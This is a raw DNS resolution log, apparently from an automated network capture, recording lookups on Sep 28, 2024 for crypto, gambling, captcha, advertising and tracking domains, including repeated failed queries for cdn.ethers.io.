                                                                                                                                                                                                                                              Sep 28, 2024 03:16:06.396143913 CEST1.1.1.1192.168.2.50x815eNo error (0)d107ul3j3wrui0.cloudfront.net143.204.205.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:06.396716118 CEST1.1.1.1192.168.2.50xbbf0No error (0)api.web3modal.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:08.232774019 CEST1.1.1.1192.168.2.50xffd3No error (0)eas.etherscan.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:08.234925032 CEST1.1.1.1192.168.2.50xde5dNo error (0)eas.etherscan.com104.26.8.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:08.234925032 CEST1.1.1.1192.168.2.50xde5dNo error (0)eas.etherscan.com104.26.9.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:08.234925032 CEST1.1.1.1192.168.2.50xde5dNo error (0)eas.etherscan.com172.67.69.250A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:09.275302887 CEST1.1.1.1192.168.2.50x2b3bNo error (0)d107ul3j3wrui0.cloudfront.net143.204.205.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:09.275302887 CEST1.1.1.1192.168.2.50x2b3bNo error (0)d107ul3j3wrui0.cloudfront.net143.204.205.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:09.275302887 CEST1.1.1.1192.168.2.50x2b3bNo error (0)d107ul3j3wrui0.cloudfront.net143.204.205.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:09.275302887 CEST1.1.1.1192.168.2.50x2b3bNo error (0)d107ul3j3wrui0.cloudfront.net143.204.205.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:10.913326025 CEST1.1.1.1192.168.2.50xf57bName error (3)b.ixncdn.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:10.914715052 CEST1.1.1.1192.168.2.50x4df0Name error (3)b.ixncdn.comnonenone65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:10.926727057 CEST1.1.1.1192.168.2.50xd1b5Name error (3)b.ixncdn.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:10.952064037 CEST1.1.1.1192.168.2.50xcca1No error (0)a.ixncdn.com146.190.146.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:11.828448057 CEST1.1.1.1192.168.2.50x2e0cNo error (0)c.ixncdn.com66.241.125.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:11.883476973 CEST1.1.1.1192.168.2.50xa8bbNo error (0)a.ixncdn.com146.190.146.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:13.470599890 CEST1.1.1.1192.168.2.50xcf0bName error (3)cdn.ethers.iononenone65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:13.489018917 CEST1.1.1.1192.168.2.50xc57cName error (3)cdn.ethers.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:13.497421980 CEST1.1.1.1192.168.2.50xc016Name error (3)cdn.ethers.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:14.115658045 CEST1.1.1.1192.168.2.50xe06aNo error (0)c.ixncdn.com66.241.125.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:16.229815960 CEST1.1.1.1192.168.2.50x5e1cName error (3)cdn.ethers.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:16.257899046 CEST1.1.1.1192.168.2.50x7249Name error (3)cdn.ethers.iononenone65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:16.329747915 CEST1.1.1.1192.168.2.50xb4aaNo error (0)api.hypelab.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:16.329747915 CEST1.1.1.1192.168.2.50xb4aaNo error (0)api.hypelab.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:16.332741022 CEST1.1.1.1192.168.2.50x168bNo error (0)api.hypelab.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:18.746947050 CEST1.1.1.1192.168.2.50x6271Name error (3)cdn.ethers.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:18.748508930 CEST1.1.1.1192.168.2.50x51c5Name error (3)cdn.ethers.iononenone65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:18.756164074 CEST1.1.1.1192.168.2.50x4648Name error (3)cdn.ethers.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:21.374242067 CEST1.1.1.1192.168.2.50x7c5fName error (3)cdn.ethers.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:21.389236927 CEST1.1.1.1192.168.2.50xb32dName error (3)cdn.ethers.iononenone65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:24.009639978 CEST1.1.1.1192.168.2.50xfdc9Name error (3)cdn.ethers.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:24.024486065 CEST1.1.1.1192.168.2.50xc7a6Name error (3)cdn.ethers.iononenone65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:24.027256012 CEST1.1.1.1192.168.2.50x43eeName error (3)cdn.ethers.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:26.608036995 CEST1.1.1.1192.168.2.50xd5b1Name error (3)cdn.ethers.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:26.641783953 CEST1.1.1.1192.168.2.50x2b0aName error (3)cdn.ethers.iononenone65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:28.985097885 CEST1.1.1.1192.168.2.50xac0dName error (3)cdn.ethers.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:29.005461931 CEST1.1.1.1192.168.2.50x6edaName error (3)cdn.ethers.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:29.152386904 CEST1.1.1.1192.168.2.50x70deName error (3)cdn.ethers.iononenone65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:31.526911974 CEST1.1.1.1192.168.2.50xbe8Name error (3)cdn.ethers.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:31.536958933 CEST1.1.1.1192.168.2.50x722fName error (3)cdn.ethers.iononenone65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:34.378279924 CEST1.1.1.1192.168.2.50xb632Name error (3)cdn.ethers.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:34.392540932 CEST1.1.1.1192.168.2.50x7f33Name error (3)cdn.ethers.iononenone65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:34.409876108 CEST1.1.1.1192.168.2.50xbaf2Name error (3)cdn.ethers.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:37.155165911 CEST1.1.1.1192.168.2.50xd456Name error (3)cdn.ethers.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:37.155987978 CEST1.1.1.1192.168.2.50x41e6Name error (3)cdn.ethers.iononenone65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:39.685888052 CEST1.1.1.1192.168.2.50x7e94Name error (3)cdn.ethers.iononenone65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:39.693017006 CEST1.1.1.1192.168.2.50xf150Name error (3)cdn.ethers.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:39.710745096 CEST1.1.1.1192.168.2.50xad5dName error (3)cdn.ethers.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:41.088746071 CEST1.1.1.1192.168.2.50x8c8aNo error (0)goto.etherscan.com104.26.8.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:41.088746071 CEST1.1.1.1192.168.2.50x8c8aNo error (0)goto.etherscan.com104.26.9.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:41.088746071 CEST1.1.1.1192.168.2.50x8c8aNo error (0)goto.etherscan.com172.67.69.250A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:41.090166092 CEST1.1.1.1192.168.2.50xcd04No error (0)goto.etherscan.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:42.495145082 CEST1.1.1.1192.168.2.50xa670Name error (3)cdn.ethers.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:42.495683908 CEST1.1.1.1192.168.2.50xe440Name error (3)cdn.ethers.iononenone65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:42.515516996 CEST1.1.1.1192.168.2.50xa9d8No error (0)bcgame.sk104.18.9.186A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:42.515516996 CEST1.1.1.1192.168.2.50xa9d8No error (0)bcgame.sk104.18.8.186A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:42.516319990 CEST1.1.1.1192.168.2.50x90feNo error (0)bcgame.sk65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:45.491174936 CEST1.1.1.1192.168.2.50x902Name error (3)cdn.ethers.iononenone65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:45.504823923 CEST1.1.1.1192.168.2.50x78bName error (3)cdn.ethers.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:45.512329102 CEST1.1.1.1192.168.2.50x62a8Name error (3)cdn.ethers.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:46.655441999 CEST1.1.1.1192.168.2.50x74c2No error (0)bcgame.sk104.18.9.186A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:46.655441999 CEST1.1.1.1192.168.2.50x74c2No error (0)bcgame.sk104.18.8.186A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:46.656335115 CEST1.1.1.1192.168.2.50xd8aNo error (0)bcgame.sk65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:50.044895887 CEST1.1.1.1192.168.2.50x43acNo error (0)socketv2.bcgame.sk104.18.8.186A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:50.044895887 CEST1.1.1.1192.168.2.50x43acNo error (0)socketv2.bcgame.sk104.18.9.186A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:50.045352936 CEST1.1.1.1192.168.2.50x861cNo error (0)socketv2.bcgame.sk65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:50.045913935 CEST1.1.1.1192.168.2.50x8c67No error (0)socket2v2.bcgame.sk104.18.8.186A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:50.045913935 CEST1.1.1.1192.168.2.50x8c67No error (0)socket2v2.bcgame.sk104.18.9.186A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:50.054891109 CEST1.1.1.1192.168.2.50xd58cNo error (0)socket2v2.bcgame.sk65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:50.715667963 CEST1.1.1.1192.168.2.50x7547No error (0)bc.imgix.netdualstack.com.imgix.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:50.715667963 CEST1.1.1.1192.168.2.50x7547No error (0)dualstack.com.imgix.map.fastly.net151.101.2.208A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:50.715667963 CEST1.1.1.1192.168.2.50x7547No error (0)dualstack.com.imgix.map.fastly.net151.101.66.208A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:50.715667963 CEST1.1.1.1192.168.2.50x7547No error (0)dualstack.com.imgix.map.fastly.net151.101.130.208A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:50.715667963 CEST1.1.1.1192.168.2.50x7547No error (0)dualstack.com.imgix.map.fastly.net151.101.194.208A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:50.715843916 CEST1.1.1.1192.168.2.50xe17No error (0)bc.imgix.netdualstack.com.imgix.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:53.247286081 CEST1.1.1.1192.168.2.50x735bName error (3)cdn.ethers.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:53.270525932 CEST1.1.1.1192.168.2.50x634aName error (3)cdn.ethers.iononenone65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:53.344640017 CEST1.1.1.1192.168.2.50xadabName error (3)cdn.ethers.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:54.738276005 CEST1.1.1.1192.168.2.50x67f0No error (0)collect.verify.lnearn.com13.32.99.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:54.738276005 CEST1.1.1.1192.168.2.50x67f0No error (0)collect.verify.lnearn.com13.32.99.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:54.738276005 CEST1.1.1.1192.168.2.50x67f0No error (0)collect.verify.lnearn.com13.32.99.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:54.738276005 CEST1.1.1.1192.168.2.50x67f0No error (0)collect.verify.lnearn.com13.32.99.84A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:55.025918961 CEST1.1.1.1192.168.2.50xf610No error (0)bc.imgix.netdualstack.com.imgix.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:55.025918961 CEST1.1.1.1192.168.2.50xf610No error (0)dualstack.com.imgix.map.fastly.net151.101.2.208A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:55.025918961 CEST1.1.1.1192.168.2.50xf610No error (0)dualstack.com.imgix.map.fastly.net151.101.66.208A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:55.025918961 CEST1.1.1.1192.168.2.50xf610No error (0)dualstack.com.imgix.map.fastly.net151.101.130.208A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:55.025918961 CEST1.1.1.1192.168.2.50xf610No error (0)dualstack.com.imgix.map.fastly.net151.101.194.208A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:55.037410975 CEST1.1.1.1192.168.2.50xdbb8No error (0)bc.imgix.netdualstack.com.imgix.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:58.230859995 CEST1.1.1.1192.168.2.50x9865Name error (3)cdn.ethers.iononenone65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:58.240381956 CEST1.1.1.1192.168.2.50x4a0cName error (3)cdn.ethers.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:58.248516083 CEST1.1.1.1192.168.2.50x6cffName error (3)cdn.ethers.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:00.046075106 CEST1.1.1.1192.168.2.50x1f00No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:02.648186922 CEST1.1.1.1192.168.2.50x9e1eNo error (0)collect.verify.lnearn.com13.32.99.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:02.648186922 CEST1.1.1.1192.168.2.50x9e1eNo error (0)collect.verify.lnearn.com13.32.99.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:02.648186922 CEST1.1.1.1192.168.2.50x9e1eNo error (0)collect.verify.lnearn.com13.32.99.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:02.648186922 CEST1.1.1.1192.168.2.50x9e1eNo error (0)collect.verify.lnearn.com13.32.99.84A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:02.869889021 CEST1.1.1.1192.168.2.50x62d9Name error (3)cdn.ethers.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:02.873784065 CEST1.1.1.1192.168.2.50xcea5Name error (3)cdn.ethers.iononenone65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:02.881906986 CEST1.1.1.1192.168.2.50x4ef6Name error (3)cdn.ethers.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:05.099836111 CEST1.1.1.1192.168.2.50x8447No error (0)js.hcaptcha.com104.19.229.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:05.099836111 CEST1.1.1.1192.168.2.50x8447No error (0)js.hcaptcha.com104.19.230.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:05.100392103 CEST1.1.1.1192.168.2.50x8c36No error (0)js.hcaptcha.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:06.055727005 CEST1.1.1.1192.168.2.50x3735No error (0)newassets.hcaptcha.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:06.055897951 CEST1.1.1.1192.168.2.50xc1a1No error (0)newassets.hcaptcha.com104.19.230.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:06.055897951 CEST1.1.1.1192.168.2.50xc1a1No error (0)newassets.hcaptcha.com104.19.229.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:06.081760883 CEST1.1.1.1192.168.2.50x5848No error (0)js.hcaptcha.com104.19.230.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:06.081760883 CEST1.1.1.1192.168.2.50x5848No error (0)js.hcaptcha.com104.19.229.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:06.083303928 CEST1.1.1.1192.168.2.50x3890No error (0)js.hcaptcha.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:06.257074118 CEST1.1.1.1192.168.2.50x758aName error (3)cdn.ethers.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:06.258996010 CEST1.1.1.1192.168.2.50x9870Name error (3)cdn.ethers.iononenone65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:08.050926924 CEST1.1.1.1192.168.2.50xfec4No error (0)api.hcaptcha.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:08.050949097 CEST1.1.1.1192.168.2.50x8b0cNo error (0)api.hcaptcha.com104.19.229.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:08.050949097 CEST1.1.1.1192.168.2.50x8b0cNo error (0)api.hcaptcha.com104.19.230.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:08.102353096 CEST1.1.1.1192.168.2.50xa0ddNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:08.102353096 CEST1.1.1.1192.168.2.50xa0ddNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:08.142034054 CEST1.1.1.1192.168.2.50x6563No error (0)adssistem.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:08.142819881 CEST1.1.1.1192.168.2.50xda5aNo error (0)adssistem.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:08.142819881 CEST1.1.1.1192.168.2.50xda5aNo error (0)adssistem.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:08.155569077 CEST1.1.1.1192.168.2.50x9c9bNo error (0)s2.adform.nets2.adformnet.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:08.158927917 CEST1.1.1.1192.168.2.50x626bNo error (0)pubads.g.doubleclick.uk.net188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:08.158927917 CEST1.1.1.1192.168.2.50x626bNo error (0)pubads.g.doubleclick.uk.net188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:08.159045935 CEST1.1.1.1192.168.2.50x6bb0No error (0)pubads.g.doubleclick.uk.net65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:08.159631968 CEST1.1.1.1192.168.2.50x1bc4No error (0)event.getblue.io18.229.151.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:08.159631968 CEST1.1.1.1192.168.2.50x1bc4No error (0)event.getblue.io54.94.170.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:08.159631968 CEST1.1.1.1192.168.2.50x1bc4No error (0)event.getblue.io18.229.254.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:08.163970947 CEST1.1.1.1192.168.2.50xd769No error (0)scripts.prdredir.com104.18.30.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:08.163970947 CEST1.1.1.1192.168.2.50xd769No error (0)scripts.prdredir.com104.18.31.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:08.165683031 CEST1.1.1.1192.168.2.50xa5b6No error (0)scripts.prdredir.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:08.165689945 CEST1.1.1.1192.168.2.50x8385No error (0)js.sentry-cdn.com151.101.130.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:08.165689945 CEST1.1.1.1192.168.2.50x8385No error (0)js.sentry-cdn.com151.101.66.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:08.165689945 CEST1.1.1.1192.168.2.50x8385No error (0)js.sentry-cdn.com151.101.2.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:08.165689945 CEST1.1.1.1192.168.2.50x8385No error (0)js.sentry-cdn.com151.101.194.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:08.166801929 CEST1.1.1.1192.168.2.50x8c72No error (0)rtgio.co65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:08.167856932 CEST1.1.1.1192.168.2.50x6ea3No error (0)rtgio.co172.67.145.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:08.167856932 CEST1.1.1.1192.168.2.50x6ea3No error (0)rtgio.co104.21.65.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:08.169471025 CEST1.1.1.1192.168.2.50x733No error (0)pixel-us.convertagain.netpixel-us-fvmarketing.ubidex.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:08.169471025 CEST1.1.1.1192.168.2.50x733No error (0)pixel-us-fvmarketing.ubidex.xyz88.214.195.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:08.169629097 CEST1.1.1.1192.168.2.50x599fNo error (0)scripts.mediamathrdrt.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:08.169672966 CEST1.1.1.1192.168.2.50x8c4fNo error (0)scripts.mediamathrdrt.com104.21.94.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:08.169672966 CEST1.1.1.1192.168.2.50x8c4fNo error (0)scripts.mediamathrdrt.com172.67.136.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:08.170048952 CEST1.1.1.1192.168.2.50x6868No error (0)s2.adform.nets2.adformnet.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:08.170048952 CEST1.1.1.1192.168.2.50x6868No error (0)nstrp.adform.net37.157.6.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:08.184098959 CEST1.1.1.1192.168.2.50x31fNo error (0)pixel-us.convertagain.netpixel-us-fvmarketing.ubidex.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:09.639717102 CEST1.1.1.1192.168.2.50xa51No error (0)my.rtmark.net139.45.195.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:09.720915079 CEST1.1.1.1192.168.2.50xe3beNo error (0)tracking.aimetric.net188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:09.720915079 CEST1.1.1.1192.168.2.50xe3beNo error (0)tracking.aimetric.net188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:09.722660065 CEST1.1.1.1192.168.2.50xa0d3No error (0)tracking.aimetric.net65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:09.778903008 CEST1.1.1.1192.168.2.50xaacaNo error (0)pixel.prdredir.com104.18.31.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:09.778903008 CEST1.1.1.1192.168.2.50xaacaNo error (0)pixel.prdredir.com104.18.30.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:09.780384064 CEST1.1.1.1192.168.2.50xe9eNo error (0)pixel.prdredir.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:09.833080053 CEST1.1.1.1192.168.2.50x92d3No error (0)metrics.aimetric.netstats-dss4061-serving.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:09.834079981 CEST1.1.1.1192.168.2.50x47ebNo error (0)metrics.aimetric.netstats-dss4061-serving.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:09.834079981 CEST1.1.1.1192.168.2.50x47ebNo error (0)stats-dss4061-serving.com167.235.116.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:09.906203985 CEST1.1.1.1192.168.2.50xc708No error (0)event.getblue.io18.229.151.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:09.906203985 CEST1.1.1.1192.168.2.50xc708No error (0)event.getblue.io18.229.254.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:09.906203985 CEST1.1.1.1192.168.2.50xc708No error (0)event.getblue.io54.94.170.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:09.939687967 CEST1.1.1.1192.168.2.50xde4bNo error (0)a1.adform.neta1.adformnet.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:09.940037012 CEST1.1.1.1192.168.2.50x4a67No error (0)a1.adform.neta1.adformnet.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:09.948913097 CEST1.1.1.1192.168.2.50xbfdbNo error (0)widget.getblue.io18.229.151.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:09.948913097 CEST1.1.1.1192.168.2.50xbfdbNo error (0)widget.getblue.io18.229.254.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:09.948913097 CEST1.1.1.1192.168.2.50xbfdbNo error (0)widget.getblue.io54.94.170.144A (IP address)IN (0x0001)false
